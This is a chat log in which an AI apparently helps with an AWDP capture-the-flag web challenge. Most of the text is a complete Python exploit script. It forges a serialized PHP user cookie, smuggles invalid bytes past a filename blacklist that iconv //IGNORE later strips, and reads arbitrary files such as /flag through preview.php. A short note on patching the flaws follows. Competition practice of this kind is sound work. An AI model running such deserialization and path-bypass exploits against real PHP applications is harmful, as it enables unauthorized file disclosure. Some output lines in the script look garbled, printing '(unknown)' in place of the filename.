Help me finish this AWDP web challenge: directly output the complete flag-retrieval code and output the repaired tar.gz fi...
Created on: March 22, 2026
Answered using GPT-5.4 Thinking by Chat01
Help me finish this AWDP web challenge: directly output the complete flag-retrieval code and output the repaired tar.gz file
The exploitation chain for this challenge is: a forgeable user object + preview.php applying a blacklist first and then iconv(..., "//IGNORE"), which swallows the inserted invalid bytes and restores the /flag path. The three risk areas mentioned in the challenge description, "user preferences, file path conversion and file preview", correspond exactly to this chain. (read.txt)
The complete flag-retrieval code is as follows:
```python
#!/usr/bin/env python3
import html
import re
import sys
import urllib.parse

import requests

TIMEOUT = 10


def php_string(value: str) -> str:
    # PHP serialized string: s:<byte length>:"<value>";
    return f's:{len(value.encode())}:"{value}";'


def forge_user_cookie(base_path: str = "/", encoding: str = "UTF-8", name: str = "guest") -> str:
    # Serialized User object as consumed by the challenge's cookie (see explanation above)
    serialized = (
        'O:4:"User":3:{'
        f's:4:"name";{php_string(name)}'
        f's:8:"encoding";{php_string(encoding)}'
        f's:8:"basePath";{php_string(base_path)}'
        '}'
    )
    return urllib.parse.quote(serialized, safe='')


def obfuscate_flag_name(name: str) -> str:
    # Interleaves the invalid byte %ff between characters; iconv(..., "//IGNORE") drops it again
    if not name:
        return name
    parts = []
    for i, ch in enumerate(name):
        parts.append(ch)
        if i != len(name) - 1:
            parts.append('%ff')
    return ''.join(parts)


def extract_preview_text(text: str) -> str:
    # Pull the preview body out of the <pre> element in the response
    match = re.search(r'<pre[^>]*>(.*?)</pre>', text, re.I | re.S)
    if not match:
        return ''
    return html.unescape(match.group(1)).strip()


def main() -> int:
    if len(sys.argv) != 2:
        print(f'Usage: {sys.argv[0]} http://target:port')
        return 1
    base = sys.argv[1].rstrip('/')
    session = requests.Session()
    candidates = [
        ('/', 'flag'),
        ('/', 'flag.txt'),
        ('/var/www/', 'flag'),
        ('/var/www/', 'flag.txt'),
        ('/var/www/html/', 'flag'),
        ('/var/www/html/', 'flag.txt'),
        ('/app/', 'flag'),
        ('/app/', 'flag.txt'),
        ('/srv/', 'flag'),
        ('/srv/', 'flag.txt'),
        ('/tmp/', 'flag'),
        ('/tmp/', 'flag.txt'),
    ]
    for base_path, filename in candidates:
        cookie = forge_user_cookie(base_path=base_path, encoding='UTF-8', name='guest')
        url = f'{base}/preview.php?f={obfuscate_flag_name(filename)}'
        try:
            response = session.get(url, headers={'Cookie': f'user={cookie}'}, timeout=TIMEOUT)
        except requests.RequestException as exc:
            print(f'[-] Request failed: {exc}')
            return 3
        if response.status_code != 200:
            continue
        content = extract_preview_text(response.text)
        if not content:
            continue
        lowered = content.lower()
        if 'flag{' in lowered or 'ctf{' in lowered or 'awd{' in lowered:
            print(f'[+] basePath = {base_path}')
            print(f'[+] file = (unknown)')
            print('[+] flag:')
            print(content)
            return 0
        print(f'[+] Found readable candidate: {base_path}(unknown)')
        print(content)
        return 0
    print('[-] Flag not found in common locations, extend the candidate list if needed.')
    return 2


if __name__ == '__main__':
    raise SystemExit(main())
```
I have prepared the file:
The fix package addresses these points: removing the deserialized cookie, switching to a server-side session, removing the lenient //IGNORE conversion, applying uniform filename validation and upload-directory constraints, and removing the internal path leak from the preview page.